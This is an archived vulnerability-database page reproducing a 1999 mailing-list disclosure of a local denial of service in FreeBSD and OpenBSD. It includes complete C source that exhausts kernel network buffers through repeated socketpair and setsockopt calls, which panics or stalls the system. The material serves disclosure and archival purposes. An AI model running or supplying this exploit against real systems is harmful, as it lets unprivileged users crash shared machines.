Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

BSD_local_DoS.txt

🗓️ 19 Sep 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 35 Views

Local denial of service attack on FreeBSD and OpenBSD by unprivileged user using socket options.

Code
`Subject: Local DoS on network by unpriviledged user using setsockopt()  
To: [email protected]   
  
  
Recently, I mailed this mailing to a number of people who are concerned  
with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The  
mailing was NOT intended to be made public, but somehow it was. Here is  
my original mailing:  
  
  
  
--- Forwarded ---  
  
  
I stumbled across a denial of service attack on FreeBSD systems, where  
an unpriviledged user can panic the kernel. Quick and dirty testing  
(code attached at the end of this mail) showed OpenBSD is vulnerable  
too:  
  
  
FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to  
test it on older FreeBSD versions.  
  
  
OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:  
The kernel logs one "/bsd: mb_map full" and all processes trying to send  
something over the network get stuck waiting in mbuf. Locally the system  
continues to function. Tested by a friend.  
  
  
NetBSD: Not available, but it is highly probable that the affected code  
in OpenBSD is from its parent NetBSD.  
  
  
As far as I'm concerned, this can be handled quietly and without much  
haste. Knowledge of this problem is limited and there is absolutely no  
intention of publishing this exploit or messages to Bugtraq.  
  
  
With kind regards,  
Sven Berkvens ([email protected])  
Long time FreeBSD-system administrator  
  
  
  
  
The source code for the program that causes this:  
  
  
#include <unistd.h>  
#include <sys/socket.h>  
#include <fcntl.h>  
  
  
#define BUFFERSIZE 204800  
  
  
extern int  
main(void)  
{  
int p[2], i;  
char crap[BUFFERSIZE];  
  
  
while (1)  
{  
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)  
break;  
i = BUFFERSIZE;  
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));  
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));  
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));  
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));  
fcntl(p[0], F_SETFL, O_NONBLOCK);  
fcntl(p[1], F_SETFL, O_NONBLOCK);  
write(p[0], crap, BUFFERSIZE);  
write(p[1], crap, BUFFERSIZE);  
}  
exit(0);  
}  
  
  
----- End forwarded message -----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Sep 1999 00:00Current
7.4High risk
Vulners AI Score7.4
denial of servicefreebsd vulnerabilityopenbsd vulnerabilityunprivileged userkernel panic.
35